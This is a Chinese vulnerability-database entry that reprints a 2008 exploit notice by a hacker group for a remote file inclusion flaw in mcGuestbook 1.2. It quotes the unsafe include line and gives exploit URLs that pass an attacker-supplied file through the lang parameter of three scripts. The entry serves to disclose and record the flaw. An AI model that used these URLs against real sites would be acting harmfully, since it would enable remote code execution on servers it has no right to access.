mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052671 漏洞类型
发布时间 2008-06-28 更新时间 2008-06-28
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008060069
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
######################################
 mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability
######################################
[~] Found : Ghost Hacker [ R-H TeaM ]           |,  .-.  .-.  ,|
[~] HOME  : www.Real-Hack.net                   | )(_o/  \o_)( | 
[~] Email : Ghost-r00t_at_Hotmail.com              |/     /\     \|
[~] Script : mcGuestbook 1.2
[~] Download Script : http://www.phpbank.net/admin/download.php?id=155
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Error ( admin.php + ecrire.php + lire.php ) :
include "$lang";

[~] Exploit :
http://xxxx/[Path]/ecrire.php?lang=[EVIL]
http://xxxx/[Path]/admin.php?lang=[EVIL]
http://xxxx/[Path]/lire.php?lang=[EVIL]
############# [ I love the Messenger of Allah Mohammad ] #############
[~] Gootz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
All Member Real Hack And All My Friends ..
##############################
 Real Hack Team ( R-H ) ..
##############################